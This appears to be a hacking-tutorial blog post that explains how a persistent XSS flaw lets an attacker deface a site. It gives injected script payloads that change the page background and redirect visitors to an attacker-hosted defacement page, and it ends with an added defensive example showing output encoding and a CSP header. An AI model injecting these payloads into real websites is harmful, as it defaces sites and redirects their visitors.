I explained how to test for XSS vulnerabilities and some filter-bypass techniques. Now let us see how a hacker defaces a website that has an XSS vulnerability.
Defacing is one of the most common things a hacker does after finding a vulnerability in a website. Defacing means replacing the website's content with the hacker's content. Most of the time, attackers use this technique to inform the admin about the vulnerability. But it's a bad idea!
Script for changing the background color of a website:
<script>document.body.bgColor="red";</script>
Script for changing the background image of a website:
<script>document.body.background="http://your_image.jpg";</script>
Never implement this technique. I am explaining it for educational purposes only.
Defacement Page with Pastehtml:
First of all, upload a defacement page (HTML) to pastehtml.com and get the link. When you find an XSS-vulnerable site, insert the script as:
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>
This script will redirect the page to your pastehtml defacement page.
Note: You can deface only sites that are vulnerable to persistent XSS.
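
Persistent XSS works because the site stores the submitted text and later writes it into the page as markup for every visitor. The following is an added example, not code from the original post: it renders the same stored input raw and HTML-encoded, and counts the script tags that would reach the browser. The function names, the comment list and the CSP header value are assumptions made for illustration.

```javascript
// Added example: stored comments rendered raw vs. HTML-encoded.
// renderUnsafe, renderSafe and storedComments are hypothetical names.

// Constructed sample of what a vulnerable site might have stored,
// using the scripts shown in this post as input.
const storedComments = [
  'Nice article!',
  '<script>document.body.bgColor="red";</script>',
  '<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>',
];

// Encode the characters that let text break out of an HTML text node or a
// quoted attribute value. "&" is replaced first to avoid double encoding.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: stored text is concatenated into the page as markup.
function renderUnsafe(comments) {
  return comments.map((c) => `<li>${c}</li>`).join('\n');
}

// Hardened: stored text is encoded at output time, so it is shown, not parsed.
function renderSafe(comments) {
  return comments.map((c) => `<li>${escapeHtml(c)}</li>`).join('\n');
}

// Defense in depth: without 'unsafe-inline', this policy stops inline
// <script> blocks from running even if an encoding step is missed.
const cspHeader = ['Content-Security-Policy', "default-src 'self'; script-src 'self'"];

// Count script tags in the HTML each renderer would send to visitors.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

console.log('unsafe:', countScriptTags(renderUnsafe(storedComments)));
console.log('safe:  ', countScriptTags(renderSafe(storedComments)));
```

Encoding at output time is the primary fix; the CSP header is a second layer that the application would send with every HTML response.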